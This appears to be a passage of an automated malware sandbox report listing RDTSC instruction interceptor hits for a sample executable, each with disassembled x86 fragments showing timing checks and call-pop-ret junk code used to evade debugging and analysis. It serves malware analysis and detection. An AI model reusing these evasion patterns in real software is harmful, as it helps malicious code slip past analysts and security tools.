                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49F17 second address: E49FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA18C4F6A2h 0x0000000b jng 00007FCA18C4F696h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FCA18C4F698h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jmp 00007FCA18C4F6A2h 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+1244A725h], ecx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FCA18C4F698h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov esi, dword ptr [ebp+12451C24h] 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 jnp 00007FCA18C4F69Ch 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49C91 second address: E49C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FA8 second address: E49FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FAE second address: E49FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FBC second address: E49FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FC1 second address: E49FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4A958 second address: E4A95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4BCF3 second address: E4BD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C784 second address: E4C79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F6A6h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E8CA second address: E4E94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FCA18DB50E8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push esi 0x00000026 movzx ebx, ax 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FCA18DB50E8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 sub ebx, dword ptr [ebp+122D399Ah] 0x0000004c mov edi, eax 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+124728F2h] 0x00000056 xchg eax, esi 0x00000057 jnc 00007FCA18DB50F1h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C79F second address: E4C7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F6A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E94C second address: E4E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4DAE8 second address: E4DAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C7BA second address: E4C7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FCA18DB50E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E951 second address: E4E957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C7E3 second address: E4C7F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E957 second address: E4E95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4F86A second address: E4F874 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18DB50E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4F874 second address: E4F8C8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA18C4F69Ch 0x00000008 je 00007FCA18C4F696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FCA18C4F698h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f and ebx, dword ptr [ebp+122D2F94h] 0x00000035 push 00000000h 0x00000037 mov bl, 99h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FCA18C4F69Ah 0x0000003f push eax 0x00000040 pushad 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4F8C8 second address: E4F8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5098C second address: E50996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA18C4F696h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E518EA second address: E518EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E51A70 second address: E51A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E52A06 second address: E52A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jns 00007FCA18DB50E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E537F8 second address: E53823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FCA18C4F6A0h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E51A76 second address: E51A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E52A22 second address: E52AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov dword ptr [ebp+12452010h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FCA18C4F698h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jmp 00007FCA18C4F6A6h 0x00000033 jmp 00007FCA18C4F69Ah 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov di, si 0x00000042 mov eax, dword ptr [ebp+122D0F59h] 0x00000048 mov dword ptr [ebp+12451AE3h], esi 0x0000004e push FFFFFFFFh 0x00000050 mov di, cx 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007FCA18C4F698h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E53823 second address: E538CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FCA18DB50E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 cmc 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FCA18DB50E8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov dword ptr [ebp+12451961h], ebx 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007FCA18DB50E8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Ah 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov dword ptr [ebp+122D2CEAh], edx 0x00000069 jmp 00007FCA18DB50EEh 0x0000006e push eax 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jbe 00007FCA18DB50E6h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E51A7A second address: E51B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FCA18C4F698h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edi, 50439899h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f movzx ebx, bx 0x00000032 jmp 00007FCA18C4F6A2h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov edi, dword ptr [ebp+122D2F94h] 0x00000044 mov eax, dword ptr [ebp+122D0A99h] 0x0000004a add ebx, dword ptr [ebp+12450836h] 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edx 0x00000055 call 00007FCA18C4F698h 0x0000005a pop edx 0x0000005b mov dword ptr [esp+04h], edx 0x0000005f add dword ptr [esp+04h], 00000019h 0x00000067 inc edx 0x00000068 push edx 0x00000069 ret 0x0000006a pop edx 0x0000006b ret 0x0000006c xor dword ptr [ebp+122D3657h], edx 0x00000072 mov ebx, 4B8DC713h 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c pop eax 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E538CA second address: E538CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E51B16 second address: E51B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E51B1A second address: E51B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E548C5 second address: E548CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E548CA second address: E54912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA18DB50E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ebx, edi 0x00000012 push 00000000h 0x00000014 mov bx, ax 0x00000017 mov di, cx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FCA18DB50E8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 add di, 5011h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E53A51 second address: E53A56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E53AF4 second address: E53AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5591E second address: E55922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E57A3E second address: E57A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E57A59 second address: E57A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E58A71 second address: E58A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bh, 57h 0x0000000b push 00000000h 0x0000000d or edi, dword ptr [ebp+122D3816h] 0x00000013 push 00000000h 0x00000015 or ebx, 36E94D1Dh 0x0000001b mov dword ptr [ebp+124525A9h], eax 0x00000021 push eax 0x00000022 jbe 00007FCA18DB50F0h 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5AB93 second address: E5AB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCA18C4F696h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5AB9D second address: E5ABCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F6h 0x00000007 jmp 00007FCA18DB50ECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E032B9 second address: E032BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5B214 second address: E5B28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA18DB50F5h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 cmc 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FCA18DB50E8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007FCA18DB50F7h 0x00000032 jg 00007FCA18DB50ECh 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D30FFh], ebx 0x00000040 push eax 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 pop esi 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E58BBF second address: E58BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E56C61 second address: E56C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E55ADB second address: E55ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5C1BC second address: E5C1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5B406 second address: E5B40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5B40B second address: E5B410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5B410 second address: E5B424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FCA18C4F6A4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5B424 second address: E5B428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5D1B3 second address: E5D1D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FCA18C4F696h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5C2E5 second address: E5C2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5C2EA second address: E5C308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5C308 second address: E5C30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5C3E0 second address: E5C3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5E08B second address: E5E08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5D430 second address: E5D44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCA18C4F6A3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5D44C second address: E5D450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E5E223 second address: E5E227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E67621 second address: E67627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E67627 second address: E6762B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E66DCE second address: E66DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E66DD2 second address: E66E32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCA18C4F6A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FCA18C4F698h 0x00000011 pop esi 0x00000012 je 00007FCA18C4F6D3h 0x00000018 jnl 00007FCA18C4F6B1h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FCA18C4F6A4h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E670F2 second address: E670F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E670F6 second address: E67101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E67101 second address: E6711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F5h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71360 second address: E7138A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F69Fh 0x00000009 jmp 00007FCA18C4F6A6h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71A62 second address: E71A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71A7D second address: E71A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FCA18C4F696h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FCA18C4F69Dh 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71C34 second address: E71C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FCA18DB50F8h 0x0000000b jnp 00007FCA18DB50E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71EDC second address: E71EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71EE2 second address: E71EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E71EEC second address: E71EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E721E6 second address: E721EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
